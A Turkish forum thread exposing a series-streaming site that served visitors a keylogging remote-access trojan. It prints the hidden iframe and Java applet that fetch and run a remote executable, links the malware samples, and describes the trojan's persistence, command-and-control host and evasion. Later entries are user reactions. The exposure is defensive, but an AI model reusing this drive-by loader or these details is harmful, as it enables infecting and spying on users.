• windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, arka planda bilgisayariniza kurduklari programla klavyeden bastiginiz her tusu (sifreler, mesajlar, vb.) bir dosyaya kaydedip o dosyayi baskasina yolluyor. (bkz: keylogger)

    (cok uzun lan bu, okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)

    bundan sonrasi teknik aciklama, nasil bir sey yaptiklarini birlikte gorelim. sitenin kaynak kodunda,

    --- kod 1---
    <a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
    --- kod 1 ---

    seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)

    peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)

    --- kod 2 ---
    <applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
    <param name="url" value="www.medyaturk24.com/java/java.exe" />
    </applet>
    --- kod 2 ---

    peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:

    --- kod 3 ---
    http://pastebin.com/bmfv8xfp
    --- kod 3 ---

    peki bu java kodu ne yapiyor biraz aciklayacak olursak,

    1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.

    2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.

    3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).

    http://www.medyaturk24.com/java/ adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)

    olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dzsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.

    java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya (https://www.facebook.com/unlemisareti) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.

    saygilar.

    ~~~~~~~~~~~~~~~~~~~~~~~

    devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.

    --- spoiler ---

    java.exe sunlari yapiyor:

    enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.

    bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.

    kendini c:\?windows\?system32\?installdir\?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:\users\user\appdata\roaming\nod.exe olur.

    yine klasik trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}

    yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.

    trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.

    keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:\documents and settings\user\application data\microsoft\windows\uwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:\users\user\appdata\ içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.

    --- spoiler ---

    onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse.

    son edit: duyuru yapmis ameleler bide utanmadan "itham" falan demisler alin ekliyim onu da:

    --- spoiler ---

    saygyde?er diziport kullanycylary,

    05.11.2011-07.11.2011 tarihlerinde sitemize kar?y düzenlenen saldyryda sunucularymyzdan birine kötü niyetli ki?ilerce syzma olmu?, teknik birimimizce syzma engellenmi? problem düzeltilmi?tir.

    bu talihsiz olayyn böylesine özel bir günde gerçekle?mi? olmasy sebebiyle üzgün oldu?umuzu belirtmek isteriz.

    bilindi?i üzere diziport yyllardyr her türlü saldyryya maruz kalmy?, bunu sadyk kullanycy kitlesi sayesinde kysa zamanda çözüme ula?tyrmy?tyr. diziport için çykan asylsyz iddialara kar?y dü?üncenizin, sadece bu günü de?il, 4 yyllyk geçmi?imizi göz önünde bulundurarak de?i?memesini temenni etmekteyiz.

    bilmenizi isteriz ki; diziport hiçbir zaman kullanycylaryn özel hayatyna ili?kin ki?isel bilgilerin pe?ine dü?mez ve böyle ahlaksyz yollara ne sebeple olursa olsun ba?vurmaz. ya?ady?ymyz bu sykyntyly olayy istismar ederek bizlere kar?y a?yr ithamlarda bulunan, site yöneticilerini acymasyzca ele?tiren/suçlayan ki?iler bilmelidir ki, kar?ylyk beklemeden hizmet eden bu site ne geçmi?te ne de bugün yüz kyzartycy bir olaya bula?mamy?tyr, bula?mayacaktyr.

    bilinmelidir ki, internet ortamynda bu tür saldyrylara her site maruz kalabilmektedir. kullanycylarymyzdan ricamyz, herhangi bir bilgi syzmasyny önlemek ve zarar görmemek için kullandy?ynyz güvenlik yazylymlarynyn güncel olmasyna dikkat etmenizdir.

    son olarak, bu olayyn sorumlulary hakkynda gerekli i?lemleri ba?latmy? oldu?umuzu tüm kullanycylarymyza duyurmak isteriz. saygylarymyzla hayyrly bayramlar
    --- spoiler ---
  • "05.11.2011-07.11.2011 tarihlerinde sitemize karşı düzenlenen saldırıda sunucularımızdan birine kötü niyetli kişilerce sızma olmuş" derken yarmış arkadaşlar. insanı da mal yerine koymuşlar

    teknik bilgisi hiç olmayan babam bile internete işi düşünce 47 kere tekrar ediyor adımı yazma diye. bir bilgisayar korsanı adını yapıştırır mı oraya? hele ki tr tescilli bir alan adı.

    ayakta adam sikmenin finalini yayınlamışlar bu sefer.
  • yemin ederim şu sitelerin başına gelenleri gördükten, işittikten sonra ortalıkta "tehlikenin farkında mısınız" diye gezinen cumhuriyet okuruna döndüm. 2008'den beri tanıdığım, neredeyse arkadaşım, pampam, badim, aile üyem saydığım diziport düştü. umarım aynı şey diğer sitelerin başına gelmez. hadi house bitiyor, bunun game of thrones'u var, dexter'ı var, ne bileyim big bang'i var, daha benim asosyalliğimle paralel olarak gelişen onca dizi var. internetten bedava, ferah furuh izleyemedikten sonra, ben nerden takip ederim bunları?
  • bilgisayarıma bulaştırdıkları virüs yüzünden dün bütün gün anneme etmediğimi bırakmadığım site. bi de tutturdum "senin arkadaşlarının gönderdikleri maillerden bulaştı" diye. aah ah ne bilirdim ki? bi de java yükletti o geri zekalı şey bana.

    virüsü fark ettiğim andan itibaren ekşi sözlük'te gördüğüm ve "bilgisayarı format atılmıştan iyi temizler" denilen programın başlığını arıyorum. yazarcanlara selam ederim!

    dedim ve dakikasına cevap geldi italianzubuk'ten: combofix ağbilerim, ablalarım!

    (bkz: ekşi sözlük'ü sevme nedenleri)
  • bu siteyi ben de kullanıyorum ve bu sitedeki okuyucu yorumlarına dikkat ediyorum nedense..
    var öyle bi manyaklığım..
    kimisi de hürriyet okuyucu yorumlarını okur..
    ben göze hoş gelen her şeyi, okurum gerçi.. geçelim.
    bu yorumlarda bişeye.. bildiin anlamda. kıl oluyorum abi.

    site beleş.. site neredeyse eş zamanlı yüklüyo çoğu diziyi.. site genelde tıkırında çalışıyo..
    bizim yüzde ellisi denyo internet kullanıcımız geliyo orda şöyle çekmiriyo.

    "admin yahu.. adam gibi yükleyin şunu.. neden tek parça yüklemiyosunuz. kırk saattir sizi bekliyorum. dizinin tamamını yükleyin. yeter artııııııııık.. çok tembelsiniz... çok yavaşsınız.. "

    ulan manyak mısın nesin
    öfff sinirleniyorum böyle işlere..
  • aklima iki soru birden getiren site,

    birincisi; neden anasayfadan herkesin okuyacağı şekilde görülebilen bir duyuru değilde txt formatında alelade linki twitter dan verilmiş bir duyurudur? herkes twitter ve sozluk okumak zorunda değil. tiklanma hitini göz önünde bulundurursak binlerce kullanıcı risk altında. muhtemelen duyulduğunda büyük ölçüde üye kaybetmekten endişe ediyorlar, ama mutlaka büyük krizlerin belli sonuçları ve kayıpları olur. bu kayıpları kabullenmeli ve en kısa zamanda ulaşabildikleri kadar fazla sayıda kullanıcıya ulaşılmalıdır. aksi takdirde bir çok kullanıcı maddi kayıba uğrayacaktır. zaten bu olay yayıldığında, insanlar ilk ağızdan değil de birbirlerinden duyduklarında tepki iyice büyüyecektir. kriz yönetimi konusunda yetersiz kalıp hala kendi çıkarlarını ön plana çıkardıklarından otur sıfır.

    ikincisi; tatil günü hangi gerekli işlemi nerede nasıl başlatıyorsun allasen? nöbetçi mahkeme? he canım, he gülüm.

    açıklaması kuru bir safsatadan başka bir şey olmayan sitedir. kendi ipini çekmiştir. ilerleyen günlerde artan ve mağdur olan kullanıcı tepkileriyle de görülecektir.
  • bir türk dizisinin altında görülen ''ben duymuyorum rica etsem tüm dizilere altyazı ekler misiniz?'' yorumu ve bununla beraber bazı kullanıcıların siteye böyle bir katkıda bulunabileceklerini belirtmeleriyle duygulandırmış site.

    edit: kafa asırı güzel duymuyorum yerine gormuyorum yazmıştım, ironi yok.
  • hayatı bu siteden dizi izlemekten ibaret olanlar için yeterli bir açıklama yapmışlar. zaten bu gibi durumlarda iş boka sarmaya başladığı an sitemize virüs attılar zırvalarına başlanır. ardından yasal işlemleri başlattık diyerek 4 rekatlık farz eda edilir. sadık kullanıcılar da bu tatmin edici açıklamarın ardından ferah ferah dizi izlemeye devam ederler. ne güzel.
  • dizi siteleri içinde en eşsiz olan bu bence. başka hangi dizi sitesinde 40 dakikalık diziyi izlemeniz 93 dakika sürebilir ki? 93 diyorum bak!
  • oldukça geniş arşivlerinden dolayı kısa zamanda 1 numara oldu. sitenin arayüzü de iyiydi. kullanımı kolay falan...

    lakin kendi database'i yok. çünkü o kadar diziyi barındıracak database sahibi olmak kolay bir iş değil. hem para hem sosyal sorumluluk gerektirir. çünkü yayınları legal değil. o yüzden facebook'un altyapısını kullanıyorlar yani videoyu facebook'a yüklüyorlar çıkış noktasını da kendi sitelerinde link olarak veriyorlar.

    işte zurnanın zırt dediği yer burası. facebook altyapısını kullanıyorlar fakat facebook'la hiçbir anlaşmaları yok. olması da mümkün görünmüyor çünkü yayınlar legal değil. sonuçta korsan içerik.

    facebook'ta 'sizin dükkanınızın deposu ben miyim?' diyip bütün kayıtları silince bu diziporta açılmayan link olarak geri dönüyor.
hesabın var mı? giriş yap